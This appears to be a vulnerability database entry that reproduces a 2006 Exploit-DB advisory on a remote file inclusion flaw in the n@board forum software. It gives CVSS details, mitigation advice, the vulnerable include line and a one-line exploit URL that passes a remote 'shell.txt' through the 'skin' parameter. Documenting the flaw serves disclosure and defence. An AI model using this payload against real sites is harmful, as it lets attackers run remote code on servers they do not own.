n@board v3.1.9e, 3.1.8cgb ,3.1.8tc skin Remote File Include Vulnerability

vendor:

n@board

by:

mdx and The_Bat_Hacker

9,3

CVSS

HIGH

Remote File Include

CWE

Product Name: n@board

Affected Version From: 3.1.9e

Affected Version To: 3.1.8tc

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

n@board v3.1.9e, 3.1.8cgb ,3.1.8tc skin Remote File Include Vulnerability

An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This request contains a maliciously crafted URL in the 'skin' parameter which can be used to include a malicious file from a remote server.

Mitigation:

The application should validate user input and filter out malicious input. The application should also use a whitelist of accepted values for the 'skin' parameter.

Source

Exploit-DB raw data:

#        n@board v3.1.9e, 3.1.8cgb ,3.1.8tc            #
#       skin Remote File Include Vulnerability         #
#                       Turkish Hacker's               #
#       Discovered By : mdx and The_Bat_Hacker         #
#                                                      #
#------------------------------------------------------
#               Cyber-Warrior TIM                      #
#         Ay ve  Y.ld.zlar Geceye Yak...r...           #
#        the moon and the stars suit the night         #
########################################################
#
# Class : REmote
########################################################
#             File Code Detailed
#File :naboard_pnr.php?
#
#Code :
#
#include"$skin/pnr_top.php";
########################################################
#
#
# Exploit : http://www.target.***/[path]/naboard_pnr.php?skin=http://shell.txt?
#
#
########################################################
#                         _ThankX_
#
#
#
#Cyber-warrior User ,PROHACK, Siber-korsanlar [redx, dipsomania, k.z.l_alev]
#Shika, xoron , real_dark_boy, All Friends
########################################################

# milw0rm.com [2006-10-11]